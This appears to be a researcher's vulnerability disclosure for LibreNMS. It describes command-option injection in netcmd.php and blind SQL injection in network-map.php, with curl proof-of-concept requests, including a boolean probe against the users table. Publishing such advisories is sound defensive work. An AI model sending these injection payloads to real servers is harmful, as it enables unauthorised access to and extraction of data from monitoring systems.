These vulnerabilities were discovered by Eldar "Wireghoul" Marcussen
LibreNMS, a fully featured network monitoring system that provides a wealth of features and device support. -- http://www.librenms.org/
Librenms was using a flawed regular expression to filter input given to commands, this allowed an attacker to specify command line options which can lead to information disclosure. The following examples could be used to check the version numbers of the binaries.
curl 'https://host/netcmd.php?query=--version&cmd=tracert' curl 'https://host/netcmd.php?query=--version&cmd=whois' curl 'https://host/netcmd.php?query=--version&cmd=ping'
The network map script suffers from a blind SQL injection vulnerability, giving a binary condition which can be used to extract data. The following example urls both show two successful attacks:
curl 'https://host/network-map.php?format=svg&device=34+and+1=1' curl 'https://host/network-map.php?format=svg&device=34+and+(select+count(username)+from+users)=5'
Versions 77e76793c518e504ceacd0cee2157f4260203fce and older
Posted by Eldar Marcussen | Permanent link